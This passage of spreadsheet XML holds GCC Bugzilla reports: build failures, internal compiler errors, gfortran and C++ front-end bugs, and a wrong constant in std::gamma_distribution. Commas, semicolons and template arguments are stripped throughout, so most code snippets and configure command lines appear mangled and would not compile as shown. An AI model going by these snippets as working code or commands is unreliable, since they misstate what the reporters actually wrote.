The real data objects that would be valid arguments for S9A are entirely disjoint from procedures that are valid arguments to S9B and S9C and the procedures that valid arguments for S9B are disjoint from the procedures that are valid arguments to S9C because the former are required to accept real arguments and the latter integer arguments. Again this interface is invalid so a standard-conforming Fortran processor need not examine such properties when deciding whether a generic collection is valid. Again the rules to cover all cases are too complicated to be useful.</t>
  </si>
  <si>
    <t>GCC-68345</t>
  </si>
  <si>
    <t>gnat build broken on dragonfly due to omission of r229342</t>
  </si>
  <si>
    <t>Due to waiting on big locale patch I haven't been testing gcc regularly.  I just did today and gnat files to build on dragonfly:
s-taprop.adb:326:32: ambiguous operand in conversion
s-taprop.adb:326:32: possible interpretation at s-osinte.ads:333
s-taprop.adb:326:32: possible interpretation at s-osinte.ads:334
s-taprop.adb:981:52: ambiguous operand in conversion
s-taprop.adb:981:52: possible interpretation at s-osinte.ads:333
s-taprop.adb:981:52: possible interpretation at s-osinte.ads:334
../gcc-interface/Makefile:311: recipe for target 's-taprop.o' failed
gmake[8]: *** [s-taprop.o] Error 1
the reason is that Get_Page_Size was changed to return an int and this was done for a number of systems except dragonfly:
https://gcc.gnu.org/viewcvs/gcc?view=revision&amp;revision=229342
The same change done on s-osinte-freebsd.ads by r229342 needs to be done on s-osinte-dragonfly.ads
DragonFly is an officially (and well) supported system on GCC!  It should not be omitted like this.</t>
  </si>
  <si>
    <t>GCC-61021</t>
  </si>
  <si>
    <t>[4.9/5 regression] libsanitizer fails to build with old glibc</t>
  </si>
  <si>
    <t>Created attachment 32718
patch to conditionalize references
We build a native i686-pc-linux-gnu toolchain against a relatively ancient sysroot (glibc 2.4) so that the resulting binaries will work on a variety of  older GNU/Linux distros.  GCC 4.9 is now failing to build this configuration due to references to undefined symbols PTRACE_GETSIGINFO and PTRACE_SETSIGINFO in libsanitizer.
I see that in other issues the maintainers have suggested disabling libsanitizer in cases where the kernel/glibc version is too old for it to build but this looks like a regression to me: it used to work in GCC 4.8.  The attached patch is sufficient to get it to at least build again and it's consistent with the way PTRACE_GETREGSET and PTRACE_SETREGSET are being handled.
libsanitizer/README.gcc says Trivial and urgent fixes (portability build fixes etc.) may go directly to the GCC tree.  Does this one qualify under that policy?  If not I'll have to echo what has already been suggested elsewhere: the minimum kernel/glibc requirements for libsanitizer need to be documented and enforced by the configure scripts if possible.</t>
  </si>
  <si>
    <t>GCC-82975</t>
  </si>
  <si>
    <t>[6 Regression] ICE in baseness at rtlanal.c:6220</t>
  </si>
  <si>
    <t>Following can be seen with cross-compiler:
$ arm-linux-gnueabi-gcc /home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr78904-6.c /dev/null -mtune=cortex-a57 -fno-sched-pressure -O3
during RTL pass: sched1
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr78904-6.c: In function â€˜fooâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.target/i386/pr78904-6.c:20:1: internal compiler error: Segmentation fault
 }
 ^
0xb692af crash_signal
	.././../gcc/toplev.c:325
0xaff79d baseness
	.././../gcc/rtlanal.c:6220
0xb075c9 decompose_normal_address
	.././../gcc/rtlanal.c:6290
0xb075c9 decompose_address(address_info* rtx_def** machine_mode unsigned char rtx_code)
	.././../gcc/rtlanal.c:6336
0x1256745 analyze_set_insn_for_autopref
	.././../gcc/haifa-sched.c:5535
0x1256932 analyze_set_insn_for_autopref
	.././../gcc/haifa-sched.c:5621
0x1256932 autopref_multipass_init
	.././../gcc/haifa-sched.c:5621
0x12601ea autopref_multipass_dfa_lookahead_guard(rtx_insn* int)
	.././../gcc/haifa-sched.c:5734
0x126a8d9 choose_ready
	.././../gcc/haifa-sched.c:6121
0x126a8d9 schedule_block(basic_block_def** void*)
	.././../gcc/haifa-sched.c:6763
0xb1034a schedule_region
	.././../gcc/sched-rgn.c:3174
0xb1034a schedule_insns()
	.././../gcc/sched-rgn.c:3513
0xb10863 schedule_insns()
	.././../gcc/sched-rgn.c:3498
0xb10863 rest_of_handle_sched
	.././../gcc/sched-rgn.c:3717
0xb10863 execute
	.././../gcc/sched-rgn.c:3825</t>
  </si>
  <si>
    <t>GCC-3918</t>
  </si>
  <si>
    <t>Access violation when using GCC to compile CGI scripts with fread and fgetc functions</t>
  </si>
  <si>
    <t>Problem accessing GCC compiled programs from IE 5.0 web browser using IIS 5.0 web server.  
The program compiles and works using the windows console. But when accesed from a web browser the program causes a STATUS_ACCESS_VIOLATION. This violation occures if the program calls the fread and fgets functions after opening a file.  
Also the programs compiles and works using the MS VC++ 6.00 compiler.
Release:
GCC Version 2.95.3-2
Environment:
Win 2000 Server
How-To-Repeat:
Create a c program that opens a file. Place the program in a cgi-bin and call it from a web browser. 
void main()
{
FILE *filename
char *filebuffer[BUFFER_SIZE]
filename = fopen(filer)
fgets(filebuffersizeof(filebuffer)filename)
printf(%sfilebuffer)
}</t>
  </si>
  <si>
    <t>mlcarey59</t>
  </si>
  <si>
    <t>GCC-11933</t>
  </si>
  <si>
    <t>[3.4 regression] Parallel bootstrap failure linking gij</t>
  </si>
  <si>
    <t>I believe this failure is due to mistaken or missing makefile dependencies in a
parallel build.  During a make -j 12 bootstrap the error is:
/local/bin/bash ./libtool --tag=GCJ --mode=link
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-g -O2  -o jv-convert --main=gnu.gcj.convert.Convert -rpath /usr/local/lib
-shared-libgcc  
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
libgcj.la 
/local/bin/bash ./libtool --tag=GCJ --mode=link
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-g -O2  -o rmiregistry --main=gnu.java.rmi.registry.RegistryImpl -rpath
/usr/local/lib -shared-libgcc  
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
libgcj.la 
/local/bin/bash ./libtool --tag=GCJ --mode=link
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-g -O2  -o rmic --main=gnu.java.rmi.rmic.RMIC -rpath /usr/local/lib
-shared-libgcc  
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
libgcj.la 
/local/bin/bash ./libtool --tag=GCJ --mode=link
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-g -O2  -o gij -rpath /usr/local/lib -shared-libgcc  gij.o
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
libgcj.la 
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/ -g -O2 -o jv-convert
--main=gnu.gcj.convert.Convert -shared-libgcc 
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
./.libs/libgcj.so
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src/.libs
-lpthread -lrt -ldl -L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc
-L/usr/ccs/bin -L/usr/ccs/lib -L/usr/local/lib -lgcc_s -lgcc_s -Wl-R
-Wl/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
-Wl-R -Wl/usr/local/lib
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/ -g -O2 -o rmic
--main=gnu.java.rmi.rmic.RMIC -shared-libgcc 
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
./.libs/libgcj.so
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src/.libs
-lpthread -lrt -ldl -L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc
-L/usr/ccs/bin -L/usr/ccs/lib -L/usr/local/lib -lgcc_s -lgcc_s -Wl-R
-Wl/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
-Wl-R -Wl/usr/local/lib
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/ -g -O2 -o rmiregistry
--main=gnu.java.rmi.registry.RegistryImpl -shared-libgcc 
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
./.libs/libgcj.so
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src/.libs
-lpthread -lrt -ldl -L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc
-L/usr/ccs/bin -L/usr/ccs/lib -L/usr/local/lib -lgcc_s -lgcc_s -Wl-R
-Wl/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
-Wl-R -Wl/usr/local/lib
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/gcj
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/
-B/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc/ -g -O2 -o gij
-shared-libgcc gij.o 
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
./.libs/libgcj.so
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src
-L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libstdc++-v3/src/.libs
-lpthread -lrt -ldl -L/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/gcc
-L/usr/ccs/bin -L/usr/ccs/lib -L/usr/local/lib -lgcc_s -lgcc_s -Wl-R
-Wl/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs
-Wl-R -Wl/usr/local/lib
ld: warning: file
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs/libgcj.so:
linked to ./.libs/libgcj.so: attempted multiple inclusion of file
ld: warning: file
/home/c/lucier/programs/gcc/gcc-3.4/objdir-sparc/sparc-sun-solaris2.8/libjava/.libs/libgcj.so:
linked to ./.libs/libgcj.so: attempted multiple inclusion of file
Undefined			first referenced
 symbol  			    in file
java::io::File::File[in-charge](java::lang::String*)./.libs/libgcj.so
gnu::gcj::runtime::StackTrace::map   ./.libs/libgcj.so
java::net::BindException::class$    ./.libs/libgcj.so
java::net::NetworkInterface::class$    ./.libs/libgcj.so
ld: fatal: Symbol referencing errors. No output written to gij
collect2: ld returned 1 exit status
The complete build log can be found at
http://www.math.purdue.edu/~lucier/build.2003-08-14.log.gz
Brad</t>
  </si>
  <si>
    <t>GCC-33118</t>
  </si>
  <si>
    <t>[4.3 Regression] #'argument_pack_select' not supported by dump_expr#</t>
  </si>
  <si>
    <t>Testcase:
template 
struct __add_const_lvalue_reference
template
class tuple
{
  tuple(typename __add_const_lvalue_reference::type ...) 
}
tuple&lt;int
--------- CUT -----
Found while cutting down PR 33091.  This is a regression because the error message was ok in 4.2.0 and before.
On the trunk we get:
t.cc: In instantiation of 'tuple &gt;':
t.cc:8:   instantiated from here
t.cc:6: error: invalid use of incomplete type 'struct __add_const_lvalue_reference'</t>
  </si>
  <si>
    <t>GCC-32360</t>
  </si>
  <si>
    <t>GFORTRAN WON'T COMPILE 'DATA PTR1 /NULL ()/' WHEN PTR1 HAS POINTER ATTRIBUTE</t>
  </si>
  <si>
    <t>Description:
This test case resulted from attempting to modify the way that the
initialization of pointers in a named common was done in some OpenMP tests.
This test case is syntatically correct but the gfortran
compiler is not able to compile it.
&gt; gfortran -v
Using built-in specs.
Target: x86_64-suse-linux
Configured with: ../xt-gcc-4.2.0/configure --prefix=/opt/gcc/4.2.0/snos --disable-nls --libdir=/opt/gcc/4.2.0/snos/lib --enable-languages=cc++fortran --with-gxx-include-dir=/opt/gcc/4.2.0/snos/include/g++ --with-slibdir=/opt/gcc/4.2.0/snos/lib --with-system-zlib --enable-shared --enable-__cxa_atexit x86_64-suse-linux
Thread model: posix
gcc version 4.2.0 20070514 (rpm:4)
&gt; cat bug2829.f
      integer pointer :: ptr1
      data ptr1 /NULL()/
      end
&gt; ftn -c bug2829.f
/opt/xt-pe/2.1/bin/snos64/ftn: INFO: linux target is being used
bug2829.f:2.23:
      data ptr1 /NULL()/
                      1
Error: NULL appears on right-hand side in assignment at (1)
- - -
NOTE:  Both the PGI &amp; Pathscale compilers compile this test case without errors.
------
Note: ftn is an alias for:
/opt/gcc/4.2.0/bin/../snos/bin/gfortran -static -v -I/opt/xt-mpt/2.1/mpich2-64/GP/include -I/opt/xt-mpt/2.1/mpich2-64/GP/include -L/opt/xt-mpt/2.1/mpich2-64/GP/lib -I/opt/acml/3.6.1/gnu64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include/superlu -I/opt/xt-mpt/2.1/sma/P/include -L/opt/acml/3.6.1/gnu64/lib -L/opt/xt-libsci/10.1.0/gnu/snos64/lib -L/opt/xt-mpt/2.1/sma/P/lib -lmpichf90 -lsci -lacml -lsma -lmpichf90 -lmpich -lrt -D__CRAYXT_COMPUTE_LINUX_TARGET -D__TARGET_LINUX__ -fno-second-underscore -I/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/include -I/opt/xt-catamount/2.1/catamount/linux/include -I/opt/xt-service/2.1/include -L/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/lib/snos64 -L/opt/xt-pe/2.1/cnos/linux/64/lib -L/opt/xt-mpt/2.1/lib/snos64 -L/opt/xt-service/2.1/lib/snos64 -Wl--start -lpct -lalpslli -lalpsutil -lportals -lpthread -Wl--end -lgfortranbegin -lgfortran -lm</t>
  </si>
  <si>
    <t>GCC-26735</t>
  </si>
  <si>
    <t>[4.1 only] -fconvert=swap and implied open</t>
  </si>
  <si>
    <t>$ cat conv-implied-open.f90
program main
  implicit none
  integer (kind=8) :: i1 i2 i3
  write (10) 1_8
  close (10)
  open (10status=old form=unformatted access=direct recl=8)
  read (10rec=1) i1
  read (10rec=2) i2
  read (10rec=3) i3
  print '(3Z161X)'i1i2i3
end program main
$ gfortran conv-implied-open.f90
$ ./a.out
               8               1               8
$ gfortran -fconvert=swap conv-implied-open.f90
$ ./a.out
 800000000000000 100000000000000 800000000000000
The second call is incorrect.  The lack of an open
statement means that the information about the byte-swapping
isn't picked up.
This is not really all that serious because I suspect most people
will give their files descriptive names if they want to move them
across architectures.</t>
  </si>
  <si>
    <t>GCC-11704</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE in type_dependent_expression_p with wrong method call in template class</t>
  </si>
  <si>
    <t xml:space="preserve">
When a wrong method call (without the parenthesis) is performed in a
template class g+++ 3.4 makes an ICE instead of reporting the error.
Environment:
System: Linux ouagadougou 2.4.21 #1 Fri Jul 25 11:19:01 CEST 2003 i686 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../../lrde/ext/gcc/configure --prefix=/home/lrde/lrde/usr/gcc-3.4 --enable-languages=cc++ : (reconfigured)  : (reconfigured) ../../lrde/ext/gcc/configure --enable-languages=cc++ --prefix=/home/lrde/lrde/usr/gcc-3.4 : (reconfigured) ../../lrde/ext/gcc/configure --enable-languages=cc++ --prefix=/home/lrde/lrde/usr/gcc-3.4 : (reconfigured)  : (reconfigured) /home/lrde/stud/burrus_n/work/lrde/ext/gcc/configure --prefix=~lrde/usr/gcc-3.4 --enable-languages=cc++ : (reconfigured) /home/lrde/stud/burrus_n/work/lrde/ext/gcc/configure --prefix=~lrde/usr/gcc-3.4 --enable-languages=cc++ : (reconfigured) /home/lrde/stud/burrus_n/work/lrde/ext/gcc/configure --prefix=~lrde/usr/gcc-3.4 --enable-languages=cc++ : (reconfigured) /home/lrde/stud/burrus_n/work/lrde/ext/gcc/configure --prefix=/home/lrde/lrde/usr/gcc-3.4 --enable-languages=cc++
How-To-Repeat:
Compile this:
struct A 
{
  int foo() 
  {
    return 5
  }
}
template  // If B is not template it works
struct B
{
  bool bar(A&amp; a)
  {
    return a.foo == 0 // parenthesis to mark method call missing
  }
}</t>
  </si>
  <si>
    <t>GCC-26862</t>
  </si>
  <si>
    <t>Non-pod data structure copied incorrectly during static initialization</t>
  </si>
  <si>
    <t>When a structure is defined without a constructor but that contains non-pod data the containing structure is also non-pod. When an array of these enclosing non-pod structures is declared as a global static array with an initializer list the structures appear to be constructed on the stack and copied into place without the use of the copy constructors of the contained non-pod members which is illegal.
The following C++ program demonstrates the problem:
#include 
class A {
public:
  A( int b ) {
    a_ = reinterpret_cast( this )
    b_ = b
  }
  A( A const &amp; that ) {
    a_ = this
    b_ = that.b_
  }
  void dump() const {
    std::cout ( this ) &lt;&lt; std::endl
    std::cout &lt;&lt;   a_ =  &lt;&lt; a_ &lt;&lt; std::endl
    std::cout &lt;&lt;   b_ =  &lt;&lt; b_ &lt;&lt; std::endl &lt;&lt; std::endl
  }
private:
  const void * a_
  int b_
}
A globalA( 1 )
static const A globalAArray[] =
{
  A( 11 )
  A( 22 )
  A( 33 )
}
struct ContainsA {
#if !defined( SHOW_GCC_BUG )
  ContainsA( A const 
#endif  // #if !defined( SHOW_GCC_BUG )
  A a1_
  A a2_
}
#if !defined( SHOW_GCC_BUG )
ContainsA::ContainsA( A const &amp; a1 A const &amp; a2 )
  : a1_( a1 )
    a2_( a2 ) {
}
#endif  // #if !defined( SHOW_GCC_BUG )
static const ContainsA containsAArray[] =
{
#if !defined( SHOW_GCC_BUG )
  ContainsA( A( 111 ) A( 222 ) )
  ContainsA( A( 333 ) A( 444 ) )
  ContainsA( A( 555 ) A( 666 ) )
#else  // #if !defined( SHOW_GCC_BUG )
  {
    A( 111 )
    A( 222 )
  }
  {
    A( 333 )
    A( 444 )
  }
  {
    A( 555 )
    A( 666 )
  }
#endif  // #if !defined( SHOW_GCC_BUG )
}
int main( void ) {
  std::cout &lt;&lt; Global A: &lt;&lt; std::endl
  globalA.dump()
  std::cout &lt;&lt; Local A: &lt;&lt; std::endl
  A localA( 3 )
  localA.dump()
  std::cout &lt;&lt; Global A Array: &lt;&lt; std::endl
  for ( int i = 0 i &lt; 3 ++i ) {
    globalAArray[ i ].dump()
  }
  std::cout &lt;&lt; Global ContainsA Array: &lt;&lt; std::endl
  for ( int i = 0 i &lt; 3 ++i ) {
    containsAArray[ i ].a1_.dump()
    containsAArray[ i ].a2_.dump()
  }
  return 0
}
If this program is compiled (on gcc 3.4.2) using -DSHOW_GCC_BUG and run the output shows that a_ != this which is not correct. Both constructors of the non-pod A class assign a_ = this. There should never be an instance of A where a_ != this. Inspecting the values of a_ when a_ != this shows that they are similar to the value of a_ for the instance of class A created locally (on the stack) suggesting that the instances of A or the instances of ContainsA were created on the stack and then memcpy'd or memmov'd into place rather than copy constructed into place. Either of these cases is invalid because class A is non-pod and should not ever be memcpy'd.</t>
  </si>
  <si>
    <t>e_hohenstein</t>
  </si>
  <si>
    <t>GCC-5938</t>
  </si>
  <si>
    <t>[IRIX] mabi=64/crtbegin.o is not -mips3</t>
  </si>
  <si>
    <t xml:space="preserve">	Customers cannot generate -mabi=64 code on older R4400 based
	Onyx and Challenge systems as mabi=64/crtbegin.o is -mips4
	and these systems only support -mips3.
Release:
3.0.1
Environment:
System: IRIX bobo 6.5-ALPHA-1288047920 03080558 IP22
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: ../configure --prefix=/usr/freeware --enable-version-specific-runtime-libs --disable-shared --enable-threads --enable-haifa
How-To-Repeat:
	Find such a system and try to compile your favorite hello
	world program with -mabi=64.</t>
  </si>
  <si>
    <t>drk</t>
  </si>
  <si>
    <t>GCC-34094</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] Undefined static data member in anonymous namespace can acquire a definition anyway</t>
  </si>
  <si>
    <t>The following program should fail to link since ::B::x is declared but not defined.  However the program compiles links and runs with gcc 4.2.1 and with a relatively recent 4.3 snapshot.
This same program fails to build under gcc 4.1 and earlier icc 8.1 and Comeau test drive.
struct A {
  A(void *) {}
}
namespace {
struct B : public A {
  B() : A(&amp;x) {}
  static int x  // declared but never defined
}
}
int main() {
  B::x = 0
}</t>
  </si>
  <si>
    <t>GCC-80506</t>
  </si>
  <si>
    <t>Wrong magic number in std::gamma_distribution</t>
  </si>
  <si>
    <t>Vincent Poinot reported the following by email:
The GNU C++ implementation uses the algorithm by Marsaglia and Tsang and
in particular an optimization that avoids computing two logarithms. It goes
like this in random.tcc:
    do
      {
      }
    while (__u &gt; result_type(1.0) - 0.331 * __n * __n * __n * __n
           &amp;&amp; (std::log(__u) &gt; (0.5 * __n * __n + __a1
                    * (1.0 - __v + std::log(__v)))))
However I am pretty sure that the constant used in the short-circuit is
wrong: the paper by the authors (http://dl.acm.org/citation.cfm?id=358414)
clearly prescribes 0.0331 instead (and this is also the value used by the
GSL library that uses the same algorithm).</t>
  </si>
  <si>
    <t>GCC-12063</t>
  </si>
  <si>
    <t>Enclosing temporary object constructors in parenthesis confuses compiler</t>
  </si>
  <si>
    <t>There seems to be a problem compiling calls to constructors of temporary objects when these 
constructors are surrounded by parenthesis as the test case below shows: 
----- t.C 
class A { 
public: 
A } 
} 
class B { 
  A 
public: 
   B(const A&amp; a) : _a((A&amp;)a) {} 
}  
void foo(const B&amp; b) { 
} 
void bar() { 
foo( B(A()) )  // this works 
foo( B((A()) )  / this does not compile 
A a 
foo( B( (a=A())) )  // this compiles 
} 
------- 
Compiling: 
g++ -c t.C 
Result: 
t.C: In function `void bar()': 
t.C:17: error: parse error before `)' token 
t.C:19: error: `a' undeclared (first use this function) 
t.C:19: error: (Each undeclared identifier is reported only once for each 
   function it appears in.) 
If I comment out line 17 (where the comments say it does not compile) I get a clean compile. 
---------- 
As for the need to surround constructors with parenthesis I'm creating objects using overloaded 
operators and use parenthesis to override the default operator precedence only that with g++ it 
does not seem to work (it does work with another compiler that I have tried).</t>
  </si>
  <si>
    <t>tal_arie</t>
  </si>
  <si>
    <t>GCC-13367</t>
  </si>
  <si>
    <t>[3.4 Regression] gcc gets an internal error when building gcc-3.4 with an installed gcc 3.4</t>
  </si>
  <si>
    <t>it's ok to compile gcc 3.4 with gcc 3.3.3. but when i use the installed gcc-
3.4 to build gcc-3.4i get an internal error:
/bin/sh ../../source/gcc-3.4/gcc/move-if-change tmp-check.h tree-check.h
echo timestamp &gt; s-check
rm -f print-rtl1.c
sed -e 's/config[.]h/bconfig.h/' ../../source/gcc-3.4/gcc/print-rtl.c &gt; print-
rtl1.c
gcc -c   -g  -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -pedantic -Wno-long-long -fno-
common   -DHAVE_CONFIG_H -DGENERATOR_FILE    -I. -I. -I../../source/gcc-
3.4/gcc -I../../source/gcc-3.4/gcc/. -I../../sou
rce/gcc-3.4/gcc/../include  print-rtl1.c -o print-rtl1.o
gcc   -g  -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -pedantic -Wno-long-long -fno-com
mon   -DHAVE_CONFIG_H -DGENERATOR_FILE  -o genflags \
        genflags.o rtl.o read-rtl.o bitmap.o ggc-none.o min-insn-modes.o 
gensupport.o insn-conditions.o print-rtl1.o \
        errors.o ../libiberty/libiberty.a
./genflags ../../source/gcc-3.4/gcc/config/i386/i386.md &gt; tmp-flags.h
/bin/sh ../../source/gcc-3.4/gcc/move-if-change tmp-flags.h insn-flags.h
echo timestamp &gt; s-flags
gcc   -g  -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -pedantic -Wno-long-long -fno-com
mon -Wno-error  -DHAVE_CONFIG_H    -I. -I. -I../../source/gcc-3.4/gcc -
I../../source/gcc-3.4/gcc/. -I../../source/gcc-3.
4/gcc/../include  \
       -c /install/gcc-build/gcc/c-parse.c -o c-parse.o
gcc -c   -g  -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -pedantic -Wno-long-long -fno-
common   -DHAVE_CONFIG_H    -I. -I. -I../../source/gcc-3.4/gcc -
I../../source/gcc-3.4/gcc/. -I../../source/gcc-3.4/gcc/.
./include  ../../source/gcc-3.4/gcc/c-lang.c -o c-lang.o
gcc -c   -g  -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -pedantic -Wno-long-long -fno-
common   -DHAVE_CONFIG_H    -I. -I. -I../../source/gcc-3.4/gcc -
I../../source/gcc-3.4/gcc/. -I../../source/gcc-3.4/gcc/.
./include  ../../source/gcc-3.4/gcc/c-pretty-print.c -o c-pretty-print.o
../../source/gcc-3.4/gcc/c-pretty-print.c:432: internal compiler error: in 
output_die at dwarf2out.c:6672
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [c-pretty-print.o] Error 1
make[2]: Leaving directory `/install/gcc-build/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/install/gcc-build/gcc'
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>stevenyi</t>
  </si>
  <si>
    <t>GCC-41248</t>
  </si>
  <si>
    <t>[4.5 Regression] VTA: Assertion at 2910 of cfgexpand.c (expand_debug_locations)</t>
  </si>
  <si>
    <t>On ia64-hp-hpux11.23 which supports a 32 and 64 bit mode I get an assertion failure during bootstrap.  This is with version 151382.
insn is:
(debug_insn 52 51 53 9 /proj/opensrc/nightly/src/trunk/libgcc/../gcc/gcov-io.c:238 (var_location:SI result (high (nil))) -1 (nil))
val is:
(plus:DI (const:DI (plus:DI (symbol_ref:DI (__gcov_var) [flags 0x2] )
            (const_int 12 [0xc])))
    (mult:SI (plus:SI (reg:SI 340 [ prephitmp.26 ])
            (const_int 4 [0x4]))
        (const_int 4 [0x4])))
So the modes do not match.  I am compiling in 32 bit mode so ptr_mode is SImode but Pmode is DImode.</t>
  </si>
  <si>
    <t>GCC-2261</t>
  </si>
  <si>
    <t>optimisation failed for Python-2.0</t>
  </si>
  <si>
    <t>I tried to compile Python-2.0
configure &amp;&amp; make test
and I got failed test
make OPT='-O' test
works OK.
By elimination of files I found the one that is guilty: Objects/longobject.o
So:
make clean &amp;&amp; make &amp;&amp; rm Objects/longobject.o &amp;&amp; make OPT='-O' test
works OK
I don't know where in the file but I can claim
that gcc optimization failed on it. 
Python test error was:
PYTHONPATH= ./python -tt ./Lib/test/regrtest.py -l
Traceback (most recent call last):
  File ./Lib/test/regrtest.py line 39 in ?
    import random
  File /export/home/ask/build/Python-2.0/Lib/random.py line 23 in ?
    import whrandom
  File /export/home/ask/build/Python-2.0/Lib/whrandom.py line 134 in ?
    _inst = whrandom()
  File /export/home/ask/build/Python-2.0/Lib/whrandom.py line 45 in __init__
    self.seed(x y z)
  File /export/home/ask/build/Python-2.0/Lib/whrandom.py line 58 in seed
    t = int((t&amp;0xffffff) ^ (t&gt;&gt;24))
OverflowError: long int too long to convert
Release:
3.1 20010308 (CVS)
Environment:
